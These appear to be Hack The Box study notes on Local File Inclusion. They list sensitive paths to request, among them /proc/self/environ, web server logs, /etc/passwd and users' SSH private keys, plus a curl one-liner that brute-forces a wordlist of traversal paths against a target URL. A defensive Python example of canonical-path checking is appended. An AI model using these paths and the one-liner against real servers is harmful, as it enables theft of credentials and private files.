HTB – LFI/RFI

Local File Inclusion

>/proc/self/cmdline
>/proc/self/maps
>/proc/self/mem
>/proc/self/cwd
>/proc/self/environ
>/proc/self/status

cmdline holds the command that was used to run the current process.

>/proc/self/cwd/[app source code/..../app.py]

cwd is a symbolic link to the current working directory, so the application's source code can be read through it.

>/proc/self/root/etc/passwd

/proc/self also contains root, a symbolic link to the process's root directory, which is used for processes running in jails or containers.

>/var/log/apache2/access.log
>/var/log/apache/access.log
>/var/log/apache2/error.log
>/var/log/apache/error.log
>/usr/local/apache/log/error_log
>/usr/local/apache2/log/error_log
>/var/log/nginx/access.log
>/var/log/nginx/error.log
>/var/log/httpd/error_log
>/etc/httpd/conf/httpd.conf
>/etc/apache2/httpd.conf
>/usr/local/apache2/conf/httpd.conf

Web server logs and Apache configuration files

>/etc/nginx/nginx.conf
>/etc/nginx/sites-enabled/default
>/etc/nginx/sites-available/default

nginx configuration paths

>/etc/passwd

Accounts

>/home/[user]/.ssh/id_rsa

SSH private key

LFI word list

more LFI paths

>while IFS= read -r line; do echo "$line"; curl -X POST --data-urlencode "image=/var/..$line" [URL]; echo ==; done < LFI-WordList-Linux

One-liner that iterates over every path in the LFI wordlist.
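The one-liner prefixes each path with /var/.., and cwd and root under /proc/self are symbolic links; both get past a filter that only compares the start of the string. The defensive counterpart, as an added example that is not code from the original page: it assumes the application restricts reads to one directory, and the function names and the uploads directory are hypothetical.

```python
import os
import tempfile
from typing import Optional


def naive_is_allowed(requested: str, base: str) -> bool:
    """Weak check (assumed for illustration): compares the raw string prefix only."""
    return requested.startswith(base.rstrip(os.sep) + os.sep)


def resolve_inside(requested: str, base: str) -> Optional[str]:
    """Return the canonical path if it stays inside base, otherwise None."""
    base_real = os.path.realpath(base)
    # realpath collapses ".." segments and follows every symlink on the way.
    target = os.path.realpath(requested)
    if os.path.commonpath([base_real, target]) != base_real:
        return None
    return target


def demo() -> dict:
    """Build a constructed directory tree and compare both checks on it."""
    with tempfile.TemporaryDirectory() as root:
        base = os.path.join(root, "uploads")  # hypothetical allowed directory
        os.mkdir(base)
        for path in (os.path.join(base, "cat.png"), os.path.join(root, "app.py")):
            with open(path, "w") as fh:
                fh.write("constructed sample\n")
        # A symlink that leads out of the allowed directory; /proc/self/cwd and
        # /proc/self/root redirect a path in the same way once it reaches them.
        os.symlink(root, os.path.join(base, "cwd"))
        cases = {
            "plain": os.path.join(base, "cat.png"),
            "dotdot": base + "/../app.py",
            "symlink": os.path.join(base, "cwd", "app.py"),
        }
        # Each value is (naive check result, hardened check result).
        return {
            name: (naive_is_allowed(p, base), resolve_inside(p, base) is not None)
            for name, p in cases.items()
        }


if __name__ == "__main__":
    for name, (naive, hardened) in demo().items():
        print(f"{name:8} naive={naive} hardened={hardened}")
```

The application should open the canonical path that resolve_inside returns rather than the original string, so the file that was checked is the file that is read.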

About the author

Nelley (乃力).
Just a villager.